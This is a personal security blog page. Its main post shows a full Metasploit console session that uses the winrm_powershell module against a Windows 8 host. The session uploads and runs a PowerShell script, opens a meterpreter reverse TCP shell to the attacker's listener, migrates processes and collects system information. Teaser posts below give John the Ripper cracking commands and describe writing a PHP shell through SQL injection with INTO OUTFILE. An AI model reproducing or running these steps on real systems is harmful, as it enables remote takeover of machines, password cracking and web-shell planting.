Skip to main content

Windows 8 Vulnerability

Window 8 "winrm_powershell" vulnerability 

I really can't wait for this new vulnerability for windows 8 possibly a critical issue for the Microsoft to fix this. Currently Metasploit exploit are still not available yet for me to test it. Hopefully it will arrive soon for me to test it!

  1. msf  exploit(winrm_powershell) > show options
  3. Module options (exploit/windows/winrm/winrm_powershell):
  5.    Name      Current Setting  Required  Description
  6.    ----      ---------------  --------  -----------
  7.    DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
  8.    PASSWORD  omfg             no        A specific password to authenticate with
  9.    Proxies                    no        Use a proxy chain
  10.    RHOST     10.6.255.158     yes       The target address
  11.    RPORT     5985             yes       The target port
  12.    URI       /wsman           yes       The URI of the WinRM service
  13.    USERNAME  sinn3r           no        A specific username to authenticate as
  14.    VHOST                      no        HTTP server virtual host
  17. Payload options (windows/meterpreter/reverse_tcp):
  19.    Name      Current Setting  Required  Description
  20.    ----      ---------------  --------  -----------
  21.    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  22.    LHOST     10.6.255.84      yes       The listen address
  23.    LPORT     4444             yes       The listen port
  26. Exploit target:
  28.    Id  Name
  29.    --  ----
  30.    0   Automatic
  33. msf  exploit(winrm_powershell) > rexploit
  34. [*] Reloading module...
  36. [*] Started reverse handler on 10.6.255.84:4444
  37. [*] Attempting to set Execution Policy
  38. [*] Grabbing %TEMP%
  39. [*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
  40. [*] Attempting to execute script...
  41. [*] Sending stage (752128 bytes) to 10.6.255.158
  42. [*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
  44. meterpreter >
  45. [*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
  46. [*] Current server process: powershell.exe (2844)
  47. [+] Migrating to 696
  48. [+] Successfully migrated to process
  50. meterpreter > sysinfo
  51. Computer        : WIN-VFQHRRTCA39
  52. OS              : Windows 8 (Build 9200).
  53. Architecture    : x86
  54. System Language : en_US
  55. Meterpreter     : x86/win32
  56. meterpreter >

Comments

Post a Comment

Popular posts from this blog

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!
Post a Comment
Read more

SQLiiiii

This is an re-post from an old archive ... From MySQL documentation : "The SELECT ... INTO OUTFILE 'file_name' form of SELECT writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed. As of MySQL 5.0.19, the character_set_filesystem system variable controls the interpretation of the filename." The INTO OUTFILE operator can be used during sql injection exploiting to write php shell on remote host. Unfortunately (fortunately?) this is only possible in some (very) race conditions : mysql user must have the FILE privilege; the operator requires a "quoted" file pathname, so the web application should not escape/filter them; httpd and mysql should be installed on the same machine, or (if you can) the file will be written on the dbms machi...
Post a Comment
Read more

MSF ::EXITFUNC::

Quick note about MSF EXITFUNC. So what is EXITFUNC? EXITFUNC option is set to 'thread' by default, and it works fine in most cases, so we don't usually look into it much. But in some situations specifying a different EXITFUNC is necessary so that you can have a clean exit from the exploited box. There are 3 different values for EXITFUNC: THREAD: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) PROCESS: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit. SEH: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs. Might be useful when we wanted to generate a payload with MSFVENOM.
Post a Comment
Read more